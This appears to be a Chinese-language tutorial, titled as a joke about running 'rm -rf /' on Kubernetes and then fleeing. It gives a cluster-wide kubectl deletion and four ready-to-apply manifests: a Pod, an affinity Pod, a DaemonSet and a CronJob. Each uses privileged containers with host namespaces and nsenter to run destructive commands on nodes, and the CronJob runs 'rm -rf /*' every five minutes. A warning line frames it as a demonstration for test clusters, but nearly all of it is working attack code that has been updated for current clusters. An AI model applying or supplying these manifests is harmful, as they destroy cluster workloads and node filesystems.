Kubernetes 系统下的 `rm -rf /`,执行完就可以跑路了

本文档主要用于展示容器特权模式(privileged 加上 hostPID/hostIPC/hostNetwork)的危害:容器借助 nsenter 进入宿主机的命名空间后,就能直接在节点上执行命令。下面的命令都具有破坏性,请只在可以随时重建的隔离测试集群中操作。对于没有节点 CLI 操作权限的用户,可以拷贝示例的 YAML,直接创建集群负载 Pod、CronJob、DaemonSet 等进行操作。

1. 直接删除全部资源

如果能登录机器(并且该机器上有可用的 kubectl 和具备删除权限的 kubeconfig),收拾好东西,执行命令:

# Cluster-wide wipe, run from a host that already has kubectl and a kubeconfig
# with delete rights. Caveat: the "all" category is an alias for a fixed set of
# workload types (pods, services, deployments, replicasets, statefulsets,
# daemonsets, jobs, cronjobs, ...); ConfigMaps, Secrets, PVCs, CRDs and the
# namespaces themselves are not part of it. -A is short for --all-namespaces.
kubectl delete all --all -A
# danger-1: plain privileged Pod. With hostPID the container sees the host's
# PID 1, and "nsenter -t 1 -m -u -i -n" joins that process's mount, UTS, IPC and
# network namespaces, so the piped kubectl command runs on the node itself. It
# only succeeds where the node has kubectl and a usable kubeconfig (typically a
# control-plane node); no affinity is set, so the scheduler may pick a worker.
# All four of privileged/hostPID/hostIPC/hostNetwork are rejected by the
# "baseline" Pod Security Standard; a cluster enforcing it refuses this Pod.
# The container exits after one run; the Pod default restartPolicy (Always)
# restarts it, so the command is re-run in a loop.
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: danger-1
  namespace: default
spec:
  hostPID: true
  hostIPC: true
  hostNetwork: true
  containers:
    - name: pod-test
      image: docker.io/alpine:3.12
      # command + args from the original, merged into one argv
      command:
        - sh
        - -c
        - "echo 'kubectl delete all --all --all-namespaces' | nsenter -t 1 -m -u -i -n"
      securityContext:
        privileged: true
  # Tolerate control-plane and critical-addon taints, and stay for up to 60 s
  # on nodes that become not-ready / unreachable.
  tolerations:
    - key: node-role.kubernetes.io/master
      effect: NoSchedule
    - key: CriticalAddonsOnly
      operator: Exists
    - key: node.kubernetes.io/not-ready
      operator: Exists
      effect: NoExecute
      tolerationSeconds: 60
    - key: node.kubernetes.io/unreachable
      operator: Exists
      effect: NoExecute
      tolerationSeconds: 60
EOF
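# danger-2: same payload as danger-1, but with a node-affinity preference for a
# control-plane node, which is where kubectl and an admin kubeconfig are most
# likely to exist on the host.
# Fixes: the original declared this Pod as "danger-1" as well, so the second
# apply collided with the first Pod (Pod specs are mostly immutable, so it would
# be rejected or become a no-op) instead of creating a second one. The affinity
# and tolerations now also cover the node-role.kubernetes.io/control-plane
# label/taint that replaced .../master on kubeadm clusters from v1.24, so the
# preference still works on current clusters.
# As with danger-1, the "baseline" Pod Security Standard rejects this Pod.
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: danger-2
  namespace: default
spec:
  affinity:
    nodeAffinity:
      preferredDuringSchedulingIgnoredDuringExecution:
        # legacy label (value is the empty string)
        - weight: 100
          preference:
            matchExpressions:
              - key: node-role.kubernetes.io/master
                operator: In
                values:
                  - ""
        # current label on kubeadm >= 1.24 clusters
        - weight: 100
          preference:
            matchExpressions:
              - key: node-role.kubernetes.io/control-plane
                operator: Exists
  hostPID: true
  hostIPC: true
  hostNetwork: true
  containers:
    - name: pod-test
      image: docker.io/alpine:3.12
      command: ["sh"]
      args: ["-c", "echo 'kubectl delete all --all --all-namespaces' | nsenter -t 1 -m -u -i -n"]
      securityContext:
        privileged: true
  tolerations:
    - key: node-role.kubernetes.io/master
      effect: NoSchedule
    - key: node-role.kubernetes.io/control-plane
      effect: NoSchedule
    - key: CriticalAddonsOnly
      operator: Exists
    - key: node.kubernetes.io/not-ready
      operator: Exists
      effect: NoExecute
      tolerationSeconds: 60
    - key: node.kubernetes.io/unreachable
      operator: Exists
      effect: NoExecute
      tolerationSeconds: 60
EOF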
# danger-3: the same privileged/hostPID/nsenter payload wrapped in a DaemonSet,
# so one copy is scheduled on every node the tolerations allow (control-plane,
# CriticalAddonsOnly, and not-ready/unreachable nodes for up to 60 s).
# No namespace is given, so it lands in the kubeconfig's current namespace.
# DaemonSet Pods use restartPolicy Always, so after sh exits the container is
# restarted and the command re-run. The "baseline" Pod Security Standard
# rejects this template for the same reasons as the Pods above.
cat <<EOF | kubectl apply -f -
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: danger-3
spec:
  selector:
    matchLabels:
      danger.kubernetes.io/name: d3
  template:
    metadata:
      labels:
        danger.kubernetes.io/name: d3
    spec:
      hostPID: true
      hostIPC: true
      hostNetwork: true
      containers:
        - name: pod-test
          image: docker.io/alpine:3.12
          # command + args from the original, merged into one argv
          command:
            - sh
            - -c
            - "echo 'kubectl delete all --all --all-namespaces' | nsenter -t 1 -m -u -i -n"
          securityContext:
            privileged: true
      tolerations:
        - key: node-role.kubernetes.io/master
          effect: NoSchedule
        - key: CriticalAddonsOnly
          operator: Exists
        - key: node.kubernetes.io/not-ready
          operator: Exists
          effect: NoExecute
          tolerationSeconds: 60
        - key: node.kubernetes.io/unreachable
          operator: Exists
          effect: NoExecute
          tolerationSeconds: 60
EOF
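# danger-4: destructive variant. Every 5 minutes a new privileged Pod enters the
# host namespaces via nsenter and runs rm -rf /* on whichever node it lands on.
# Fix: batch/v1beta1 CronJob was removed in Kubernetes 1.25; batch/v1 (available
# since 1.21) carries the same spec shape, so nothing else changes.
# The payload is kept verbatim. Note that the container runs as uid 0 (no
# runAsUser is set) and nsenter keeps that identity, so sudo adds nothing and
# only makes the command fail on hosts where sudo is not installed.
# The "baseline" Pod Security Standard rejects this Pod template as well.
cat <<EOF | kubectl apply -f -
apiVersion: batch/v1
kind: CronJob
metadata:
  name: danger-4
spec:
  schedule: "*/5 * * * *"
  jobTemplate:
    spec:
      template:
        spec:
          restartPolicy: OnFailure
          hostPID: true
          hostIPC: true
          hostNetwork: true
          containers:
            - name: pod-test
              image: docker.io/alpine:3.12
              command: ["sh"]
              args: ["-c", "echo 'sudo rm -rf /*' | nsenter -t 1 -m -u -i -n"]
              securityContext:
                privileged: true
          tolerations:
            - key: node-role.kubernetes.io/master
              effect: NoSchedule
            - key: CriticalAddonsOnly
              operator: Exists
            - key: node.kubernetes.io/not-ready
              operator: Exists
              effect: NoExecute
              tolerationSeconds: 60
            - key: node.kubernetes.io/unreachable
              operator: Exists
              effect: NoExecute
              tolerationSeconds: 60
EOF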